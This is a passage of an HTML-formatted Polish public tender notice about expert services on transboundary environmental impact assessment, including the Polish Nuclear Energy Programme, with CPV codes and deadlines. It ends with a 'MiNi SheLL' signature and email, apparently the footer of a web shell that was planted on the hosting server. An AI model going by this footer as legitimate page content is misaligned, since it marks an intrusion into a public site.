Wykonawcy w zakresie realizacji systemu, - wsparcie w negocjacjach z Wykonawcami w ramach wdrażania przyjętych rozwiązań, - składanie uzasadnionych wniosków o wprowadzenie zmian do dokumentacji technicznej, - ocena postępów pracy (z uzasadnieniem) na podstawie przyjętych rozwiązań, - konsultacje z Zamawiającym (w miarę potrzeb)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 71.31.30.00-5, 72.22.41.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie V - Świadczenie usług eksperckich w zakresie strategicznej oceny oddziaływania na środowisko oraz ocen oddziaływania na środowisko w kontekście transgranicznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług eksperckich w zakresie strategicznej oceny oddziaływania na środowisko oraz ocen oddziaływania na środowisko w kontekście transgranicznym, w tym: a) konsultacje w zakresie procedur ocen oddziaływania na środowisko w kontekście transgranicznym projektów dokumentów strategicznych i planowanych przedsięwzięć, a w szczególności: - weryfikacja dokumentacji ooś przekazywanej stronom narażonym, - weryfikacja odpowiedzi i wyjaśnień dla stron narażonych w ramach konsultacji prowadzonych w trybie art. 5 Konwencji o ocenach oddziaływania na środowisko w kontekście transgranicznym sporządzonej w Espoo dnia 21 lutego 1991 r., - współpraca przy organizacji oraz udział w konsultacjach  transgranicznych (w tym w szczególności dla projektu Programu Polskiej Energetyki Jądrowej), - weryfikacja protokołów z konsultacji (w tym w szczególności dla projektu Programu Polskiej Energetyki Jądrowej), - współpraca przy przygotowywaniu wyjaśnień dla zainteresowanych organów i społeczeństwa w ramach udziału opinii publicznej w trakcie oceny transgranicznej prowadzonej dla projektu Programu Polskiej Energetyki Jądrowej; b) analiza i weryfikacja projektów dwustronnych umów międzyrządowych w zakresie ocen oddziaływania na środowisko w kontekście transgranicznym, c) współpraca przy opiniowaniu projektów dokumentów o charakterze strategicznym i prognoz do tych dokumentów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 71.31.30.00-5, 72.22.41.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com